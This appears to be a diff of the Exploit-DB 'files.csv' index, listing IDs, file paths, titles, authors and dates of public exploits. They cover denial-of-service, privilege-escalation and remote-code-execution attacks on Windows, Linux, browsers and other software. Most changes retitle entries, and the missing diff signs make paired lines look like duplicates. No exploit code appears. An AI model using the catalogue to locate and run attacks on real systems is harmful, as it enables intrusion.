27055,platforms/windows/dos/27055.txt,"Microsoft Excel 95 < 2004 - Malformed Graphic File Code Execution",2006-01-09,ad@heapoverflow.com,windows,dos,0
27069,platforms/windows/dos/27069.txt,"Apple QuickTime 6.4/6.5/7.0.x - PictureViewer '.JPEG'/.PICT' File Buffer Overflow",2006-01-11,"Dennis Rand",windows,dos,0
27082,platforms/windows/dos/27082.txt,"Microsoft Internet Explorer 5.0.1 - Malformed IMG and XML Parsing Denial of Service",2006-01-16,"Inge Henriksen",windows,dos,0
27082,platforms/windows/dos/27082.txt,"Microsoft Internet Explorer 5.0.1 - Malformed .IMG / .XML Parsing Denial of Service",2006-01-16,"Inge Henriksen",windows,dos,0
27089,platforms/windows/dos/27089.c,"CounterPath eyeBeam 1.1 build 3010n - SIP Header Data Remote Buffer Overflow (1)",2006-01-11,ZwelL,windows,dos,0
27090,platforms/windows/dos/27090.c,"CounterPath eyeBeam 1.1 build 3010n - SIP Header Data Remote Buffer Overflow (2)",2006-01-15,ZwelL,windows,dos,0
27094,platforms/multiple/dos/27094.txt,"AmbiCom Blue Neighbors 2.50 build 2500 - BlueTooth Stack Object Push Buffer Overflow",2006-01-16,"Kevin Finisterre",multiple,dos,0
@ -3910,7 +3910,7 @@ id,file,description,date,author,platform,type,port
30956,platforms/linux/dos/30956.txt,"CoolPlayer 2.17 - 'CPLI_ReadTag_OGG()' Buffer Overflow",2007-12-28,"Luigi Auriemma",linux,dos,0
30934,platforms/windows/dos/30934.txt,"Total Player 3.0 - '.m3u' File Denial of Service",2007-12-25,"David G.M.",windows,dos,0
30936,platforms/windows/dos/30936.html,"AOL Picture Editor 'YGPPicEdit.dll' ActiveX Control 9.5.1.8 - Multiple Buffer Overflow Vulnerabilities",2007-12-25,"Elazar Broad",windows,dos,0
30942,platforms/linux/dos/30942.c,"Extended Module Player (xmp) 2.5.1 - 'oxm.c' And 'dtt_load.c' Multiple Local Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",linux,dos,0
30942,platforms/linux/dos/30942.c,"Extended Module Player (xmp) 2.5.1 - 'oxm.c' / 'dtt_load.c' Multiple Local Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",linux,dos,0
30943,platforms/multiple/dos/30943.txt,"Libnemesi 0.6.4-rc1 - Multiple Remote Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",multiple,dos,0
30985,platforms/linux/dos/30985.txt,"libcdio 0.7x - GNU Compact Disc Input and Control Library Buffer Overflow Vulnerabilities",2007-12-30,"Devon Miller",linux,dos,0
30989,platforms/multiple/dos/30989.txt,"Pragma Systems FortressSSH 5.0 - 'msvcrt.dll' Exception Handling Remote Denial of Service",2008-01-04,"Luigi Auriemma",multiple,dos,0
@ -4299,7 +4299,7 @@ id,file,description,date,author,platform,type,port
33951,platforms/windows/dos/33951.txt,"Baidu Spark Browser 26.5.9999.3511 - Remote Stack Overflow (Denial of Service)",2014-07-02,LiquidWorm,windows,dos,0
33973,platforms/windows/dos/33973.pl,"Hyplay 1.2.0326.1 - '.asx' Remote Denial of Service",2010-05-10,"Steve James",windows,dos,0
33977,platforms/windows/dos/33977.txt,"Torque Game Engine - Multiple Denial of Service Vulnerabilities",2010-05-09,"Luigi Auriemma",windows,dos,0
34010,platforms/win_x86/dos/34010.html,"Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption (PoC) (MS14-035)",2014-07-08,"Drozdova Liudmila",win_x86,dos,0
34010,platforms/win_x86/dos/34010.html,"Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free / Memory Corruption (PoC) (MS14-035)",2014-07-08,"Drozdova Liudmila",win_x86,dos,0
34027,platforms/solaris/dos/34027.txt,"Sun Solaris 10 - Nested Directory Tree Local Denial of Service",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0
34028,platforms/solaris/dos/34028.txt,"Sun Solaris 10 - 'in.ftpd' Long Command Handling Security",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0
34051,platforms/windows/dos/34051.py,"Core FTP Server 1.0.343 - Directory Traversal",2010-05-28,"John Leitch",windows,dos,0
@ -4325,7 +4325,7 @@ id,file,description,date,author,platform,type,port
34249,platforms/linux/dos/34249.txt,"Freeciv 2.2.1 - Multiple Remote Denial of Service Vulnerabilities",2010-07-03,"Luigi Auriemma",linux,dos,0
34251,platforms/windows/dos/34251.txt,"Multiple Tripwire Interactive Games - 'STEAMCLIENTBLOB' Multiple Denial of Service Vulnerabilities",2010-07-05,"Luigi Auriemma",windows,dos,0
34261,platforms/multiple/dos/34261.txt,"Unreal Engine 2.5 - 'UpdateConnectingMessage()' Remote Stack Buffer Overflow",2010-07-06,"Luigi Auriemma",multiple,dos,0
34270,platforms/multiple/dos/34270.txt,"Ubisoft Ghost Recon Advanced Warfighter - Integer Overflow and Array Indexing Overflow",2010-07-07,"Luigi Auriemma",multiple,dos,0
34270,platforms/multiple/dos/34270.txt,"Ubisoft Ghost Recon Advanced Warfighter - Integer Overflow / Array Indexing Overflow",2010-07-07,"Luigi Auriemma",multiple,dos,0
34278,platforms/linux/dos/34278.txt,"LibTIFF 3.9.4 - Out-Of-Order Tag Type Mismatch Remote Denial of Service",2010-07-12,"Tom Lane",linux,dos,0
34279,platforms/linux/dos/34279.txt,"LibTIFF 3.9.4 - Unknown Tag Second Pass Processing Remote Denial of Service",2010-06-14,"Tom Lane",linux,dos,0
34528,platforms/multiple/dos/34528.py,"Adobe Acrobat and Reader 9.3.4 - 'AcroForm.api' Memory Corruption",2010-08-25,ITSecTeam,multiple,dos,0
@ -5003,7 +5003,7 @@ id,file,description,date,author,platform,type,port
39428,platforms/windows/dos/39428.txt,"PotPlayer 1.6.5x - '.mp3' Crash (PoC)",2016-02-09,"Shantanu Khandelwal",windows,dos,0
39429,platforms/windows/dos/39429.txt,"Adobe Photoshop CC / Bridge CC - '.png' Parsing Memory Corruption (1)",2016-02-09,"Francis Provencher",windows,dos,0
39430,platforms/windows/dos/39430.txt,"Adobe Photoshop CC / Bridge CC - '.png' Parsing Memory Corruption (2)",2016-02-09,"Francis Provencher",windows,dos,0
39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC & Bridge CC - '.iff' Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0
39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC / Bridge CC - '.iff' Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0
39444,platforms/windows/dos/39444.txt,"Alternate Pic View 2.150 - '.pgm' Crash (PoC)",2016-02-15,"Shantanu Khandelwal",windows,dos,0
39445,platforms/linux/dos/39445.c,"NTPd ntp-4.2.6p5 - 'ctl_putdata()' Buffer Overflow",2016-02-15,"Marcin Kozlowski",linux,dos,0
39447,platforms/windows/dos/39447.py,"Network Scanner 4.0.0.0 - Crash (SEH) (PoC)",2016-02-15,INSECT.B,windows,dos,0
@ -5052,7 +5052,7 @@ id,file,description,date,author,platform,type,port
39543,platforms/linux/dos/39543.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - 'cdc_acm' Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0
39544,platforms/linux/dos/39544.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - 'aiptek' Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0
39545,platforms/linux/dos/39545.txt,"Linux Kernel 3.10/3.18 /4.4 - Netfilter IPT_SO_SET_REPLACE Memory Corruption",2016-03-09,"Google Security Research",linux,dos,0
39546,platforms/windows/dos/39546.txt,"Nitro Pro 10.5.7.32 & Nitro Reader 5.5.3.1 - Heap Memory Corruption",2016-03-10,"Francis Provencher",windows,dos,0
39546,platforms/windows/dos/39546.txt,"Nitro Pro 10.5.7.32 / Nitro Reader 5.5.3.1 - Heap Memory Corruption",2016-03-10,"Francis Provencher",windows,dos,0
39550,platforms/multiple/dos/39550.py,"libotr 4.1.0 - Memory Corruption",2016-03-10,"X41 D-Sec GmbH",multiple,dos,0
39551,platforms/multiple/dos/39551.txt,"Putty pscp 0.66 - Stack Buffer Overwrite",2016-03-10,tintinweb,multiple,dos,0
39555,platforms/linux/dos/39555.txt,"Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'snd-usb-audio' Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos,0
@ -5216,7 +5216,7 @@ id,file,description,date,author,platform,type,port
40253,platforms/windows/dos/40253.html,"Microsoft Internet Explorer - MSHTML!CMultiReadStreamLifetimeManager::ReleaseThreadStateInternal Read AV",2016-08-16,"Google Security Research",windows,dos,0
40255,platforms/windows/dos/40255.txt,"Microsoft Windows - GDI+ DecodeCompressedRLEBitmap Invalid Pointer Arithmetic Out-of-Bounds Write (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0
40256,platforms/windows/dos/40256.txt,"Microsoft Windows - GDI+ ValidateBitmapInfo Invalid Pointer Arithmetic Out-of-Bounds Reads (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0
40257,platforms/windows/dos/40257.txt,"Microsoft Windows - GDI+ EMR_EXTTEXTOUTA and EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0
40257,platforms/windows/dos/40257.txt,"Microsoft Windows - GDI+ EMR_EXTTEXTOUTA / EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0
40308,platforms/multiple/dos/40308.txt,"Adobe Flash - Stage.align Setter Use-After-Free",2016-08-29,"Google Security Research",multiple,dos,0
40289,platforms/hardware/dos/40289.txt,"ObiHai ObiPhone 1032/1062 < 5-0-0-3497 - Multiple Vulnerabilities",2016-08-22,"David Tomaschik",hardware,dos,0
40291,platforms/linux/dos/40291.txt,"Eye of Gnome 3.10.2 - GMarkup Out of Bounds Write",2016-08-23,"Kaslov Dmitri",linux,dos,0
@ -5365,7 +5365,7 @@ id,file,description,date,author,platform,type,port
41164,platforms/multiple/dos/41164.c,"macOS 10.12.1 / iOS Kernel - 'IOService::matchPassive' Use-After-Free",2017-01-26,"Google Security Research",multiple,dos,0
41165,platforms/multiple/dos/41165.c,"macOS 10.12.1 / iOS Kernel - 'host_self_trap' Use-After-Free",2017-01-26,"Google Security Research",multiple,dos,0
41192,platforms/multiple/dos/41192.c,"OpenSSL 1.1.0 - Remote Client Denial of Service",2017-01-26,"Guido Vranken",multiple,dos,0
41211,platforms/android/dos/41211.txt,"Google Android - 'cfp_ropp_new_key_reenc' and 'cfp_ropp_new_key' RKP Memory Corruption",2017-02-01,"Google Security Research",android,dos,0
41211,platforms/android/dos/41211.txt,"Google Android - 'cfp_ropp_new_key_reenc' / 'cfp_ropp_new_key' RKP Memory Corruption",2017-02-01,"Google Security Research",android,dos,0
41212,platforms/android/dos/41212.txt,"Google Android - Unprotected MSRs in EL1 RKP Privilege Escalation",2017-02-01,"Google Security Research",android,dos,0
41213,platforms/osx/dos/41213.html,"Apple WebKit - 'HTMLFormElement::reset()' Use-After Free",2017-02-01,"Google Security Research",osx,dos,0
41214,platforms/multiple/dos/41214.html,"Google Chrome - 'HTMLKeygenElement::shadowSelect()' Type Confusion",2017-02-01,"Google Security Research",multiple,dos,0
@ -5419,7 +5419,7 @@ id,file,description,date,author,platform,type,port
41637,platforms/windows/dos/41637.py,"FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow",2017-03-19,ScrR1pTK1dd13,windows,dos,0
41639,platforms/windows/dos/41639.txt,"ExtraPuTTY 0.29-RC2 - Denial of Service",2017-03-20,hyp3rlinx,windows,dos,0
41643,platforms/hardware/dos/41643.txt,"Google Nest Cam 5.2.1 - Buffer Overflow Conditions Over Bluetooth LE",2017-03-20,"Jason Doyle",hardware,dos,0
41645,platforms/windows/dos/41645.txt,"Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc and nt!ExpFindAndRemoveTagBigPages (MS17-017)",2017-03-20,"Google Security Research",windows,dos,0
41645,platforms/windows/dos/41645.txt,"Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc / nt!ExpFindAndRemoveTagBigPages (MS17-017)",2017-03-20,"Google Security Research",windows,dos,0
41646,platforms/windows/dos/41646.txt,"Microsoft Windows - Uniscribe Font Processing Out-of-Bounds Read in usp10!otlChainRuleSetTable::rule (MS17-011)",2017-03-20,"Google Security Research",windows,dos,0
41647,platforms/windows/dos/41647.txt,"Microsoft Windows - 'USP10!otlList::insertAt' Uniscribe Font Processing Heap-Based Buffer Overflow (MS17-011)",2017-03-20,"Google Security Research",windows,dos,0
41648,platforms/windows/dos/41648.txt,"Microsoft Windows - Uniscribe Font Processing Heap-Based Out-of-Bounds Read/Write in 'USP10!AssignGlyphTypes' (MS17-011)",2017-03-20,"Google Security Research",windows,dos,0
@ -5506,7 +5506,7 @@ id,file,description,date,author,platform,type,port
42006,platforms/windows/dos/42006.cpp,"Microsoft Windows 7 Kernel - Uninitialized Memory in the Default dacl Descriptor of System Processes Token",2017-05-15,"Google Security Research",windows,dos,0
42007,platforms/windows/dos/42007.cpp,"Microsoft Windows 10 Kernel - nt!NtTraceControl (EtwpSetProviderTraits) Pool Memory Disclosure",2017-05-15,"Google Security Research",windows,dos,0
42008,platforms/windows/dos/42008.cpp,"Microsoft Windows 7 Kernel - 'win32k!xxxClientLpkDrawTextEx' Stack Memory Disclosure",2017-05-15,"Google Security Research",windows,dos,0
42009,platforms/windows/dos/42009.txt,"Microsoft Windows 7 Kernel - Pool-Based Out-of-Bounds Reads Due to bind() Implementation Bugs in afd.sys and tcpip.sys",2017-05-15,"Google Security Research",windows,dos,0
42009,platforms/windows/dos/42009.txt,"Microsoft Windows 7 Kernel - Pool-Based Out-of-Bounds Reads Due to bind() Implementation Bugs in afd.sys / tcpip.sys",2017-05-15,"Google Security Research",windows,dos,0
42014,platforms/ios/dos/42014.txt,"Apple iOS < 10.3.2 - Notifications API Denial of Service",2017-05-17,CoffeeBreakers,ios,dos,0
42017,platforms/multiple/dos/42017.txt,"Adobe Flash - AVC Deblocking Out-of-Bounds Read",2017-05-17,"Google Security Research",multiple,dos,0
42018,platforms/multiple/dos/42018.txt,"Adobe Flash - Margin Handling Heap Corruption",2017-05-17,"Google Security Research",multiple,dos,0
@ -5703,6 +5703,7 @@ id,file,description,date,author,platform,type,port
42945,platforms/multiple/dos/42945.py,"Dnsmasq < 2.78 - Lack of free() Denial of Service",2017-10-02,"Google Security Research",multiple,dos,0
42946,platforms/multiple/dos/42946.py,"Dnsmasq < 2.78 - Integer Underflow",2017-10-02,"Google Security Research",multiple,dos,0
42955,platforms/multiple/dos/42955.html,"WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization (2)",2017-10-04,"Google Security Research",multiple,dos,0
42970,platforms/linux/dos/42970.txt,"binutils 2.29.51.20170921 - 'read_1_byte' Heap-Based Buffer Overflow",2017-10-10,"Agostino Sarubbo",linux,dos,0
42962,platforms/windows/dos/42962.py,"PyroBatchFTP 3.17 - Buffer Overflow (SEH)",2017-10-07,"Kevin McGuigan",windows,dos,0
42969,platforms/multiple/dos/42969.rb,"IBM Notes 8.5.x/9.0.x - Denial of Service (Metasploit)",2017-08-31,"Dhiraj Mishra",multiple,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
@ -5794,9 +5795,9 @@ id,file,description,date,author,platform,type,port
317,platforms/linux/local/317.txt,"Resolv+ (RESOLV_HOST_CONF) - Linux Library Local Exploit",1996-01-01,"Jared Mauch",linux,local,0
319,platforms/linux/local/319.c,"sudo.bin - NLSPATH Privilege Escalation",1996-02-13,_Phantom_,linux,local,0
320,platforms/linux/local/320.pl,"suid_perl 5.001 - Exploit",1996-06-01,"Jon Lewis",linux,local,0
321,platforms/multiple/local/321.c,"BSD & Linux umount - Privilege Escalation",1996-08-13,bloodmask,multiple,local,0
321,platforms/multiple/local/321.c,"BSD / Linux - 'umount' Privilege Escalation",1996-08-13,bloodmask,multiple,local,0
322,platforms/linux/local/322.c,"Xt Library - Privilege Escalation",1996-08-24,"b0z0 bra1n",linux,local,0
325,platforms/linux/local/325.c,"BSD & Linux lpr - Privilege Escalation",1996-10-25,"Vadim Kolontsov",linux,local,0
325,platforms/linux/local/325.c,"BSD / Linux - 'lpr' Privilege Escalation",1996-10-25,"Vadim Kolontsov",linux,local,0
328,platforms/solaris/local/328.c,"Solaris 2.4 - '/bin/fdformat' Local Buffer Overflow",1997-03-23,"Cristian Schipor",solaris,local,0
330,platforms/solaris/local/330.sh,"Solaris 2.5.1 lp / lpsched - Symlink Vulnerabilities",1997-05-03,"Chris Sheldon",solaris,local,0
331,platforms/linux/local/331.c,"LibXt - 'XtAppInitialize()' Overflow *xterm Exploit",1997-05-14,"Ming Zhang",linux,local,0
@ -5880,7 +5881,7 @@ id,file,description,date,author,platform,type,port
793,platforms/osx/local/793.pl,"Apple Mac OSX - '.DS_Store' Arbitrary File Overwrite",2005-02-07,vade79,osx,local,0
795,platforms/osx/local/795.pl,"Apple Mac OSX Adobe Version Cue - Privilege Escalation (Perl)",2005-02-07,0xdeadbabe,osx,local,0
796,platforms/linux/local/796.sh,"Exim 4.42 - Privilege Escalation",2005-02-07,darkeagle,linux,local,0
798,platforms/windows/local/798.c,"DelphiTurk CodeBank 3.1 - Local 'Username' and Password Disclosure",2005-02-08,Kozan,windows,local,0
798,platforms/windows/local/798.c,"DelphiTurk CodeBank 3.1 - Local Username and Password Disclosure",2005-02-08,Kozan,windows,local,0
803,platforms/windows/local/803.c,"DelphiTurk FTP 1.0 - Passwords to Local Users Exploit",2005-02-09,Kozan,windows,local,0
811,platforms/windows/local/811.c,"DelphiTurk e-Posta 1.0 - Local Exploit",2005-02-10,Kozan,windows,local,0
816,platforms/linux/local/816.c,"GNU a2ps - 'Anything to PostScript' Local Exploit (Not SUID)",2005-02-13,lizard,linux,local,0
@ -8594,7 +8595,7 @@ id,file,description,date,author,platform,type,port
33576,platforms/linux/local/33576.txt,"Battery Life Toolkit 1.0.9 - 'bltk_sudo' Privilege Escalation",2010-01-28,"Matthew Garrett",linux,local,0
33589,platforms/lin_x86-64/local/33589.c,"Linux Kernel 3.2.0-23/3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Privilege Escalation (3)",2014-05-31,"Vitaly Nikolenko",lin_x86-64,local,0
33523,platforms/linux/local/33523.c,"Linux Kernel < 2.6.28 - 'fasync_helper()' Privilege Escalation",2009-12-16,"Tavis Ormandy",linux,local,0
33604,platforms/linux/local/33604.sh,"SystemTap 1.0/1.1 - '__get_argv()' and '__get_compat_argv()' Local Memory Corruption",2010-02-05,"Josh Stone",linux,local,0
33604,platforms/linux/local/33604.sh,"SystemTap 1.0/1.1 - '__get_argv()' / '__get_compat_argv()' Local Memory Corruption",2010-02-05,"Josh Stone",linux,local,0
33614,platforms/linux/local/33614.c,"dbus-glib pam_fprintd - Privilege Escalation",2014-06-02,"Sebastian Krahmer",linux,local,0
33623,platforms/linux/local/33623.txt,"Accellion Secure File Transfer Appliance - Multiple Command Restriction Weakness Privilege Escalation",2010-02-10,"Tim Brown",linux,local,0
33725,platforms/aix/local/33725.txt,"IBM AIX 6.1.8 libodm - Arbitrary File Write",2014-06-12,Portcullis,aix,local,0
@ -8643,7 +8644,7 @@ id,file,description,date,author,platform,type,port
35021,platforms/linux/local/35021.rb,"Linux PolicyKit - Race Condition Privilege Escalation (Metasploit)",2014-10-20,Metasploit,linux,local,0
35040,platforms/windows/local/35040.txt,"iBackup 10.0.0.32 - Privilege Escalation",2014-10-22,"Glafkos Charalambous",windows,local,0
35074,platforms/windows/local/35074.py,"Free WMA MP3 Converter 1.8 - '.wav' Buffer Overflow",2014-10-27,metacom,windows,local,0
35077,platforms/windows/local/35077.txt,"Filemaker Pro 13.03 & Advanced 12.04 - Login Bypass / Privilege Escalation",2014-10-27,"Giuseppe D'Amore",windows,local,0
35077,platforms/windows/local/35077.txt,"Filemaker Pro 13.03 / Advanced 12.04 - Login Bypass / Privilege Escalation",2014-10-27,"Giuseppe D'Amore",windows,local,0
35101,platforms/windows/local/35101.rb,"Microsoft Windows - TrackPopupMenu Win32k Null Pointer Dereference (MS14-058) (Metasploit)",2014-10-28,Metasploit,windows,local,0
35112,platforms/linux/local/35112.sh,"IBM Tivoli Monitoring 6.2.2 kbbacf1 - Privilege Escalation",2014-10-29,"Robert Jaroszuk",linux,local,0
35161,platforms/linux/local/35161.c,"Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Privilege Escalation (2)",2012-01-12,zx2c4,linux,local,0
@ -9284,7 +9285,8 @@ id,file,description,date,author,platform,type,port
42948,platforms/osx/local/42948.txt,"Apple Mac OS X + Safari - Local Javascript Quarantine Bypass",2017-07-15,"Filippo Cavallarin",osx,local,0
42951,platforms/windows/local/42951.py,"DiskBoss Enterprise 8.4.16 - Local Buffer Overflow",2017-10-03,C4t0ps1s,windows,local,0
42960,platforms/win_x86-64/local/42960.txt,"Microsoft Windows 10 RS2 (x64) - 'win32kfull!bFill' Pool Overflow",2017-10-06,siberas,win_x86-64,local,0
42963,platforms/windows/local/42963.py,"ASX to MP3 converter < 3.1.3.7 - Stack Overflow (DEP Bypass)",2017-10-08,"Nitesh Shilpkar",windows,local,0
42963,platforms/windows/local/42963.py,"ASX to MP3 converter < 3.1.3.7 - '.asx' Stack Overflow (DEP Bypass)",2017-10-08,"Nitesh Shilpkar",windows,local,0
42974,platforms/windows/local/42974.py,"ASX to MP3 3.1.3.7 - '.m3u' Buffer Overflow",2017-10-11,"Parichay Rai",windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -9600,7 +9602,7 @@ id,file,description,date,author,platform,type,port
969,platforms/windows/remote/969.c,"Golden FTP Server Pro 2.52 - Remote Buffer Overflow (3)",2005-04-29,darkeagle,windows,remote,21
970,platforms/linux/remote/970.c,"Snmppd - SNMP Proxy Daemon Remote Format String",2005-04-29,cybertronic,linux,remote,164
975,platforms/windows/remote/975.py,"GlobalScape Secure FTP Server 3.0 - Buffer Overflow",2005-05-01,muts,windows,remote,21
976,platforms/windows/remote/976.cpp,"Microsoft Windows - WINS Vulnerability and OS/SP Scanner",2005-05-02,class101,windows,remote,0
976,platforms/windows/remote/976.cpp,"Microsoft Windows - WINS Vulnerability + OS/SP Scanner",2005-05-02,class101,windows,remote,0
977,platforms/hp-ux/remote/977.c,"HP-UX FTPD 1.1.214.4 - 'REST' Remote Brute Force Exploit",2005-05-03,phased,hp-ux,remote,0
979,platforms/windows/remote/979.txt,"Hosting Controller 0.6.1 - Unauthenticated User Registration (1)",2005-05-04,Mouse,windows,remote,0
981,platforms/linux/remote/981.c,"dSMTP Mail Server 3.1b (Linux) - Format String Exploit",2005-05-05,cybertronic,linux,remote,25
@ -10915,7 +10917,7 @@ id,file,description,date,author,platform,type,port
15337,platforms/windows/remote/15337.py,"DATAC RealWin SCADA Server 1.06 - Buffer Overflow",2010-10-27,blake,windows,remote,0
15347,platforms/windows/remote/15347.py,"XBMC 9.04.1r20672 - soap_action_name post upnp sscanf Buffer Overflow",2010-10-28,n00b,windows,remote,0
15349,platforms/windows/remote/15349.txt,"Home FTP Server 1.11.1.149 - Authenticated Directory Traversal",2010-10-29,chr1x,windows,remote,0
15352,platforms/windows/remote/15352.html,"Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving document.write and appendChild Exploit (From the Wild)",2010-10-29,Unknown,windows,remote,0
15352,platforms/windows/remote/15352.html,"Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving 'document.write' / 'appendChild' Exploit",2010-10-29,Unknown,windows,remote,0
15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 RETR DELE RMD - Directory Traversal",2010-10-30,"Yakir Wizman",windows,remote,0
15358,platforms/windows/remote/15358.txt,"SmallFTPd 1.0.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0
15368,platforms/windows/remote/15368.php,"Buffy 1.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0
@ -11212,7 +11214,7 @@ id,file,description,date,author,platform,type,port
16506,platforms/windows/remote/16506.rb,"Microsoft Internet Explorer - Daxctle.OCX KeyFrame Method Heap Buffer Overflow (MS06-067) (Metasploit)",2010-07-16,Metasploit,windows,remote,0
16507,platforms/windows/remote/16507.rb,"Microsoft Visual Studio - Msmask32.ocx ActiveX Buffer Overflow (MS08-070) (Metasploit)",2010-11-24,Metasploit,windows,remote,0
16508,platforms/windows/remote/16508.rb,"Novell iPrint Client - ActiveX Control Buffer Overflow (Metasploit)",2008-06-16,Metasploit,windows,remote,0
16509,platforms/windows/remote/16509.rb,"Mozilla Firefox - Interleaving document.write and appendChild Exploit (Metasploit)",2011-02-22,Metasploit,windows,remote,0
16509,platforms/windows/remote/16509.rb,"Mozilla Firefox - Interleaving 'document.write' / 'appendChild' Exploit (Metasploit)",2011-02-22,Metasploit,windows,remote,0
16510,platforms/windows/remote/16510.rb,"McAfee Subscription Manager - Stack Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0
16511,platforms/windows/remote/16511.rb,"Logitech VideoCall - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
16512,platforms/windows/remote/16512.rb,"Symantec AppStream LaunchObj - ActiveX Control Arbitrary File Download and Execute (Metasploit)",2010-11-24,Metasploit,windows,remote,0
@ -11766,7 +11768,7 @@ id,file,description,date,author,platform,type,port
18695,platforms/windows/remote/18695.py,"Sysax 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0
18658,platforms/windows/remote/18658.rb,"Ricoh DC Software DL-10 SR10 FTP Server (SR10.exe) - FTP USER Command Buffer Overflow (Metasploit)",2012-03-24,Metasploit,windows,remote,0
18666,platforms/windows/remote/18666.rb,"UltraVNC 1.0.2 Client - 'vncviewer.exe' Buffer Overflow (Metasploit)",2012-03-26,Metasploit,windows,remote,0
18672,platforms/windows/remote/18672.txt,"Quest InTrust 10.4.x - ReportTree and SimpleTree Classes",2012-03-28,rgod,windows,remote,0
18672,platforms/windows/remote/18672.txt,"Quest InTrust 10.4.x - ReportTree / SimpleTree Classes",2012-03-28,rgod,windows,remote,0
18673,platforms/hardware/remote/18673.txt,"D-Link DCS-5605 Network Surveillance - ActiveX Control 'DcsCliCtrl.dll' lstrcpyW Remote Buffer Overflow",2012-03-28,rgod,hardware,remote,0
18674,platforms/windows/remote/18674.txt,"Quest InTrust 10.4.x - Annotation Objects ActiveX Control 'AnnotateX.dll' Uninitialized Pointer Remote Code Execution",2012-03-28,rgod,windows,remote,0
18675,platforms/hardware/remote/18675.txt,"TRENDnet SecurView TV-IP121WN Wireless Internet Camera - UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow",2012-03-28,rgod,hardware,remote,0
@ -11817,7 +11819,7 @@ id,file,description,date,author,platform,type,port
19033,platforms/windows/remote/19033.txt,"Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities",2012-06-10,kingcope,windows,remote,0
19039,platforms/bsd/remote/19039.txt,"BSD 4.2 fingerd - Buffer Overflow",1988-10-01,anonymous,bsd,remote,0
19040,platforms/solaris/remote/19040.txt,"SunView (SunOS 4.1.1) - selection_svc Exploit",1990-08-14,"Peter Shipley",solaris,remote,0
19044,platforms/solaris/remote/19044.txt,"SunOS 4.1.3 - LD_LIBRARY_PATH and LD_OPTIONS",1992-05-27,anonymous,solaris,remote,0
19044,platforms/solaris/remote/19044.txt,"SunOS 4.1.3 - LD_LIBRARY_PATH / LD_OPTIONS Exploit",1992-05-27,anonymous,solaris,remote,0
19047,platforms/aix/remote/19047.txt,"Stalker Internet Mail Server 1.6 - Buffer Overflow",2001-09-12,"David Luyer",aix,remote,0
19048,platforms/aix/remote/19048.txt,"IRIX 6.4 - 'pfdisplay.cgi' Exploit",1998-04-07,"J.A. Gutierrez",aix,remote,0
19069,platforms/linux/remote/19069.txt,"Qualcomm Eudora Internet Mail Server 1.2 - Buffer Overflow",1998-04-14,"Netstat Webmaster",linux,remote,0
@ -11832,7 +11834,7 @@ id,file,description,date,author,platform,type,port
19092,platforms/multiple/remote/19092.py,"MySQL - Authentication Bypass",2012-06-12,"David Kennedy (ReL1K)",multiple,remote,0
19093,platforms/multiple/remote/19093.txt,"Allaire ColdFusion Server 4.0 - Remote File Display / Deletion / Upload / Execution",1998-12-25,rain.forest.puppy,multiple,remote,0
19094,platforms/windows/remote/19094.txt,"Microsoft Internet Explorer 4/5 - DHTML Edit ActiveX Control File Stealing / Cross Frame Access",1999-04-22,"Georgi Guninsky",windows,remote,0
19096,platforms/linux/remote/19096.c,"RedHat Linux 5.1 & Caldera OpenLinux Standard 1.2 - Mountd",1998-08-28,LucySoft,linux,remote,0
19096,platforms/linux/remote/19096.c,"RedHat Linux 5.1 / Caldera OpenLinux Standard 1.2 - Mountd",1998-08-28,LucySoft,linux,remote,0
19099,platforms/hardware/remote/19099.rb,"F5 BIG-IP - SSH Private Key Exposure (Metasploit)",2012-06-13,Metasploit,hardware,remote,0
